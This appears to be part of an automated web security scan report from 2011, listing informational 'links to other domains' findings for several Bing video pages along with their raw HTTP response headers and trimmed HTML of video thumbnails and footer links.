http://img4.catalog.video.msn.com/Image.aspx?uuid=9f193ac5-0949-4608-890c-6e99b792f2de&w=160&h=90&so=4
http://img4.catalog.video.msn.com/Image.aspx?uuid=ea1c6044-bd5a-4ae1-be60-c3585f699dc2&w=160&h=90&so=4
http://img4.catalog.video.msn.com/Image.aspx?uuid=ea1c6044-bd5a-4ae1-be60-c3585f699dc2&w=400&h=300&so=4
http://mail.live.com/
http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx
http://today.msnbc.msn.com/
http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2fice-cube-talks-tv-film-and-music%2f6vztnpj%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=dark&height=21
http://www.msn.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 111010
Content-Type: text/html; charset=utf-8
Expires: Wed, 02 Feb 2011 15:58:18 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.719 secs
X-UA-Compatible: IE=7
Date: Wed, 02 Feb 2011 15:43:19 GMT
Connection: close
Set-Cookie: from=en-us_msnhp; domain=.bing.com; path=/videos
Set-Cookie: gt1=42007; domain=.bing.com; path=/videos
Set-Cookie: ocid=42007; domain=.bing.com; path=/videos
Set-Cookie: _SS=SID=7C5FE46609BE4E3A9076C3F8E41856C4; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Fri, 01-Feb-2013 15:43:18 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2cdd20830f9ef94917afbd4f441898d81d; expires=Fri, 01-Feb-2013 15:43:18 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:19 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
<link rel="canonical" href="http://www.bing.com/videos/watch/video/ice-cube-talks-tv-film-and-music/6vztnpj" /><link rel="image_src" href="http://img4.catalog.video.msn.com/Image.aspx?uuid=ea1c6044-bd5a-4ae1-be60-c3585f699dc2&w=400&h=300&so=4" type="" title="" /><link rel="stylesheet" href="http://img1.video.s-msn.com/res/1.0.3710.02/css/BingStyles.css" type="text/css"/><style type="text/css">
...[SNIP]...
</style><script type="text/javascript" src="http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js"></script>
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<div class="facebookLike"><iframe src="http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2fice-cube-talks-tv-film-and-music%2f6vztnpj%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=dark&height=21" scrolling="no" frameborder="0" style="width:100%; height: 100%; overflow: hidden; border:none;" allowTransparency="true"></iframe>
...[SNIP]...
<span class="playmsg"><img class="playclock" src="http://img1.video.s-msn.com/res/1.0.3710.02/i/videoModule/timer.gif" /><span class='count p1-4'>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http://today.msnbc.msn.com/" data-instName="InfoRelatedLinks">TODAYshow.com home page</a>
...[SNIP]...
 executive producer Ice Cube and director Alfonso Ribeiro (Remember Carlton of "Fresh Prince"?) and the cast." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=212c632c-9610-46f3-868a-d23fab5ac326&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
2;about the second season of his hit sitcom “Are We There Yet” and dishes on new film and music projects." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=ea1c6044-bd5a-4ae1-be60-c3585f699dc2&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
We There Yet." Cube talks about his television success, his new flick "Lottery Ticket" and soon-to-be-released album." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=3506b307-4997-4d04-b938-dd119573e1c9&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
t how the show is bringing back the traditional family sitcom and the influence Tyler Perry has had on the genre." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=af37f3a7-01df-4cc3-a948-74ad2a655431&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
Thumb playerUrl"
title="Discussing whether the economy is finally turning a corner, with Julia Coronado, North America BNP Paribas." >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=8eb75cb2-ca4a-474d-83ee-1e93b23ade22&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
2;bottom, with Michael Farr, Farr, Miller and Washington; Gerald Jordan, Jordan Opportunity Fund; and CNBCs Erin Burnett." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=c01c69b3-35d3-4908-9de3-fa09edcaf3f9&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
Thumb playerUrl"
title="Discussing whether the economy is finally turning a corner, with Julia Coronado, North America BNP Paribas." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=11329c94-ec82-4afe-b7c5-899e56c80e8b&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
title="Ice Cube gives Jimmy the recipe to his favorite sandwich and talks about his show 'Are We There Yet?'" >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=51e16117-6dd6-477f-bf66-b175d1a90116&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
rl"
title="Father of four, Ice Cube talks about bringing 'Are We There Yet?' to TV and his career since NWA" >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=ad528ffd-a5d6-4594-b12e-d87dd31f366d&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
rUrl"
title="Are we there yet? Simon can't control his bladder during a road trip to the Hamptons. Take a look." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=4b4406e5-344a-48c6-ba3d-41a62347ba79&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
didn’t see his shadow at Gobbler’s Knob in Pennsylvania, a supposed sign that warmer weather is not far away." >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=6b3222e0-1445-4e17-b419-d0fcb848ef05&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
;cancellation of more than 6,000 flights and prompting power outages from Texas to Michigan. NBC's Kevin Tibbles reports." >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=b90d1eb0-1315-45d7-9f04-a6ffe5ab7739&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
playerUrl"
title="Steelers' linebacker James Harrison jokes around about not hurting any Packers player during the Super Bowl." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=47523ab5-14fb-4760-9679-3f871b32eb18&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
erUrl"
title="Filmed in Blairgowrie, Australia, this beautiful little octopus had no problems squeezing itself out of a bottle." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=ac26b877-b2bc-4c23-8388-f2423bf000a1&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
title="Chomping at the bit to support your team? Get in the game by learning to heckle the other team's fans." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=9f193ac5-0949-4608-890c-6e99b792f2de&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=FD,52.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=FD,54.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&ID=FD,56.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=FD,58.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=FD,60.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&ID=FD,62.1')">Help</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js"></script>
...[SNIP]...

17.235. http://www.bing.com/videos/watch/video/jay-mohr-part-1/17wj9ueo7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/jay-mohr-part-1/17wj9ueo7

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/videos/watch/video/jay-mohr-part-1/17wj9ueo7?q=Justin+Bieber&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008

The response contains the following links to other domains:

http://advertising.microsoft.com/advertise-on-bing
http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js
http://g.live.com/9uxp9en-us/ftr1
http://g.msn.com/0TO_/enus
http://g.msn.com/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://img1.catalog.video.msn.com/Image.aspx?uuid=018deed9-8278-4356-827b-6e4882e619d6&w=160&h=90&so=4
http://img1.catalog.video.msn.com/Image.aspx?uuid=47523ab5-14fb-4760-9679-3f871b32eb18&w=160&h=90&so=4
http://img1.catalog.video.msn.com/Image.aspx?uuid=6846d747-416b-4d35-8e5f-ff005241eb93&w=160&h=90&so=4
http://img1.catalog.video.msn.com/Image.aspx?uuid=e7d055e2-139f-4d38-98f6-b4dc24021439&w=160&h=90&so=4
http://img1.video.s-msn.com/res/1.0.3710.02/css/BingStyles.css
http://img1.video.s-msn.com/res/1.0.3710.02/i/videoModule/timer.gif
http://img2.catalog.video.msn.com/Image.aspx?uuid=01a8b2aa-598f-483c-97c9-2b41b7d7b161&w=160&h=90&so=4
http://img2.catalog.video.msn.com/Image.aspx?uuid=4ebe1d33-a5c7-40f0-bd6e-e0540f004afd&w=160&h=90&so=4
http://img2.catalog.video.msn.com/Image.aspx?uuid=772bfd28-3ca3-4d7a-9726-1a68ac332dc2&w=160&h=90&so=4
http://img2.catalog.video.msn.com/Image.aspx?uuid=ac26b877-b2bc-4c23-8388-f2423bf000a1&w=160&h=90&so=4
http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js
http://img3.catalog.video.msn.com/Image.aspx?uuid=3a9a15a1-dd97-36ee-061e-0b718a26204b&w=160&h=90&so=4
http://img3.catalog.video.msn.com/Image.aspx?uuid=48b53a98-90f5-45be-a971-44870c550402&w=160&h=90&so=4
http://img3.catalog.video.msn.com/Image.aspx?uuid=6b3222e0-1445-4e17-b419-d0fcb848ef05&w=160&h=90&so=4
http://img3.catalog.video.msn.com/Image.aspx?uuid=8a2cd483-7afe-4303-bac5-50ad86dae06a&w=160&h=90&so=4
http://img3.catalog.video.msn.com/Image.aspx?uuid=b90d1eb0-1315-45d7-9f04-a6ffe5ab7739&w=160&h=90&so=4
http://img4.catalog.video.msn.com/Image.aspx?uuid=5a9bc7a7-e3b4-4416-a1cc-0b5fa7b2966a&w=160&h=90&so=4
http://img4.catalog.video.msn.com/Image.aspx?uuid=9f193ac5-0949-4608-890c-6e99b792f2de&w=160&h=90&so=4
http://mail.live.com/
http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx
http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2fjay-mohr-part-1%2f17wj9ueo7%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=dark&height=21
http://www.hulu.com/the-tonight-show-with-jay-leno
http://www.hulu.com/watch?content_id=50118065
http://www.msn.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 104187
Content-Type: text/html; charset=utf-8
Expires: Wed, 02 Feb 2011 15:58:18 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.766 secs
X-UA-Compatible: IE=7
Date: Wed, 02 Feb 2011 15:43:18 GMT
Connection: close
Set-Cookie: from=en-us_msnhp; domain=.bing.com; path=/videos
Set-Cookie: gt1=42008; domain=.bing.com; path=/videos
Set-Cookie: ocid=42008; domain=.bing.com; path=/videos
Set-Cookie: _SS=SID=D2547B15F9A24BA98E03DAB3C7FFE7C8; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Fri, 01-Feb-2013 15:43:17 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c37fc55856c584608a47042f42a9be2a2; expires=Fri, 01-Feb-2013 15:43:17 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:18 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
<link rel="canonical" href="http://www.bing.com/videos/watch/video/jay-mohr-part-1/17wj9ueo7" /><link rel="stylesheet" href="http://img1.video.s-msn.com/res/1.0.3710.02/css/BingStyles.css" type="text/css"/><style type="text/css">
...[SNIP]...
</style><script type="text/javascript" src="http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js"></script>
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<div class="facebookLike"><iframe src="http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2fjay-mohr-part-1%2f17wj9ueo7%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=dark&height=21" scrolling="no" frameborder="0" style="width:100%; height: 100%; overflow: hidden; border:none;" allowTransparency="true"></iframe>
...[SNIP]...
<span class="playmsg"><img class="playclock" src="http://img1.video.s-msn.com/res/1.0.3710.02/i/videoModule/timer.gif" /><span class='count p1-4'>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http://www.hulu.com/the-tonight-show-with-jay-leno" data-instName="InfoRelatedLinks">Hulu - The Tonight Show with Jay Leno</a>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http://www.hulu.com/watch?content_id=50118065" data-instName="InfoRelatedLinks">Hulu Watch Page - Jay Mohr, Part 1</a>
...[SNIP]...
Url"
title="The official movie trailer for 'Justin Bieber: Never Say Never' available in 3D on February 11th, 2011." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=772bfd28-3ca3-4d7a-9726-1a68ac332dc2&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
gets nailed in the head after someone in the crowd launched a water bottle straight at him. Pretty good accuracy!" >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=48b53a98-90f5-45be-a971-44870c550402&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
r/20n5jvur?q=Justin%20Bieber&rel=MSN" class="motionThumb playerUrl"
title="Word is spreading in the feline nation .... don't trust Bieber!!" >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=8a2cd483-7afe-4303-bac5-50ad86dae06a&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
rl"
title="It might be something about his bowl cut, but whatever it is, this cat hates the sight of Justin Bieber." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=018deed9-8278-4356-827b-6e4882e619d6&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
 her only escape is through singing Justin Bieber's 'Baby'. Which makes for the best Justin Bieber cover yet." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=6846d747-416b-4d35-8e5f-ff005241eb93&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
angerous place. Justin Bieber learned this the hard way when a fan threw a bottle and it hit him in the face." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=01a8b2aa-598f-483c-97c9-2b41b7d7b161&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
="motionThumb playerUrl"
title="The infinitely talented Justin Bieber shows us how he walks throw... er... in.... into 

doors." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=4ebe1d33-a5c7-40f0-bd6e-e0540f004afd&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
his cute Justin Bieber fan knows all the lyrics she cares about. Watch little baby Ella sing along to "Baby."" >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=e7d055e2-139f-4d38-98f6-b4dc24021439&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
his rise to stardom alongside real-life concert footage in this 3-D offering. Jon Chu ("Step Up 3D") directs." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=5a9bc7a7-e3b4-4416-a1cc-0b5fa7b2966a&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
iff-diving/zg1kvke2?q=Justin%20Bieber&rel=MSN" class="motionThumb playerUrl"
title="Justin Bieber cliff diving at Waimea Bay on Oahu's North Shore." >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=3a9a15a1-dd97-36ee-061e-0b718a26204b&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
didn’t see his shadow at Gobbler’s Knob in Pennsylvania, a supposed sign that warmer weather is not far away." >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=6b3222e0-1445-4e17-b419-d0fcb848ef05&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
;cancellation of more than 6,000 flights and prompting power outages from Texas to Michigan. NBC's Kevin Tibbles reports." >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=b90d1eb0-1315-45d7-9f04-a6ffe5ab7739&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
playerUrl"
title="Steelers' linebacker James Harrison jokes around about not hurting any Packers player during the Super Bowl." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=47523ab5-14fb-4760-9679-3f871b32eb18&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
erUrl"
title="Filmed in Blairgowrie, Australia, this beautiful little octopus had no problems squeezing itself out of a bottle." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=ac26b877-b2bc-4c23-8388-f2423bf000a1&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
title="Chomping at the bit to support your team? Get in the game by learning to heckle the other team's fans." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=9f193ac5-0949-4608-890c-6e99b792f2de&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=FD,52.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=FD,54.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&ID=FD,56.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=FD,58.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=FD,60.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&ID=FD,62.1')">Help</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js"></script>
...[SNIP]...

17.236. http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv?form=ETMONA&from=en-us_msnhp

The response contains the following links to other domains:

http://advertising.microsoft.com/advertise-on-bing
http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js
http://g.live.com/9uxp9en-us/ftr1
http://g.msn.com/0TO_/enus
http://g.msn.com/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://images.video.msn.com/flash/customPlayer/1_0/customPlayer.swf?player.v=390a5af2-fac2-4e20-8b6e-4cc518d71596&player.fullscreen=false&player.ap=true&mkt=en-US&configName=syndicationplayer&configCsid=msnvideo
http://img1.catalog.video.msn.com/Image.aspx?uuid=47523ab5-14fb-4760-9679-3f871b32eb18&w=160&h=90&so=4
http://img1.video.s-msn.com/res/1.0.3710.02/css/BingStyles.css
http://img1.video.s-msn.com/res/1.0.3710.02/i/videoModule/timer.gif
http://img2.catalog.video.msn.com/Image.aspx?uuid=ac26b877-b2bc-4c23-8388-f2423bf000a1&w=160&h=90&so=4
http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js
http://img3.catalog.video.msn.com/Image.aspx?uuid=6b3222e0-1445-4e17-b419-d0fcb848ef05&w=160&h=90&so=4
http://img3.catalog.video.msn.com/Image.aspx?uuid=b90d1eb0-1315-45d7-9f04-a6ffe5ab7739&w=160&h=90&so=4
http://img4.catalog.video.msn.com/Image.aspx?uuid=390a5af2-fac2-4e20-8b6e-4cc518d71596&w=400&h=300&so=4
http://img4.catalog.video.msn.com/Image.aspx?uuid=9f193ac5-0949-4608-890c-6e99b792f2de&w=160&h=90&so=4
http://mail.live.com/
http://movies.msn.com/
http://movies.msn.com/comingsoon
http://movies.msn.com/movies/movie.aspx?m=2278080
http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx
http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2frio-films-first-two-minutes%2f5eq4owv%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=dark&height=21
http://www.msn.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 77374
Content-Type: text/html; charset=utf-8
Expires: Wed, 02 Feb 2011 15:58:28 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.078 secs
X-UA-Compatible: IE=7
Date: Wed, 02 Feb 2011 15:43:28 GMT
Connection: close
Set-Cookie: from=en-us_msnhp; domain=.bing.com; path=/videos
Set-Cookie: _SS=SID=5A86ECC36E34429890A9098D97A000AD; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Fri, 01-Feb-2013 15:43:28 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c0b86cfda968c42abbd8910da2588a90e; expires=Fri, 01-Feb-2013 15:43:28 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:28 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
<link rel="canonical" href="http://www.bing.com/videos/watch/video/rio-films-first-two-minutes/5eq4owv" /><link rel="video_src" href="http://images.video.msn.com/flash/customPlayer/1_0/customPlayer.swf?player.v=390a5af2-fac2-4e20-8b6e-4cc518d71596&player.fullscreen=false&player.ap=true&mkt=en-US&configName=syndicationplayer&configCsid=msnvideo" type="" title="" /><link rel="image_src" href="http://img4.catalog.video.msn.com/Image.aspx?uuid=390a5af2-fac2-4e20-8b6e-4cc518d71596&w=400&h=300&so=4" type="" title="" /><link rel="stylesheet" href="http://img1.video.s-msn.com/res/1.0.3710.02/css/BingStyles.css" type="text/css"/><style type="text/css">
...[SNIP]...
</style><script type="text/javascript" src="http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js"></script>
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<div class="facebookLike"><iframe src="http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2frio-films-first-two-minutes%2f5eq4owv%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=dark&height=21" scrolling="no" frameborder="0" style="width:100%; height: 100%; overflow: hidden; border:none;" allowTransparency="true"></iframe>
...[SNIP]...
<span class="playmsg"><img class="playclock" src="http://img1.video.s-msn.com/res/1.0.3710.02/i/videoModule/timer.gif" /><span class='count p1-4'>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http://movies.msn.com/movies/movie.aspx?m=2278080" data-instName="InfoRelatedLinks">Learn more about 'Rio'</a>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http://movies.msn.com/comingsoon" data-instName="InfoRelatedLinks">Coming Soon</a>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http://movies.msn.com/" data-instName="InfoRelatedLinks">MSN Movies</a>
...[SNIP]...
didn’t see his shadow at Gobbler’s Knob in Pennsylvania, a supposed sign that warmer weather is not far away." >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=6b3222e0-1445-4e17-b419-d0fcb848ef05&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
;cancellation of more than 6,000 flights and prompting power outages from Texas to Michigan. NBC's Kevin Tibbles reports." >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=b90d1eb0-1315-45d7-9f04-a6ffe5ab7739&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
playerUrl"
title="Steelers' linebacker James Harrison jokes around about not hurting any Packers player during the Super Bowl." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=47523ab5-14fb-4760-9679-3f871b32eb18&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
erUrl"
title="Filmed in Blairgowrie, Australia, this beautiful little octopus had no problems squeezing itself out of a bottle." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=ac26b877-b2bc-4c23-8388-f2423bf000a1&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
title="Chomping at the bit to support your team? Get in the game by learning to heckle the other team's fans." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=9f193ac5-0949-4608-890c-6e99b792f2de&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=FD,52.1')">© 2011 Microsoft</a>
...[SNIP]...
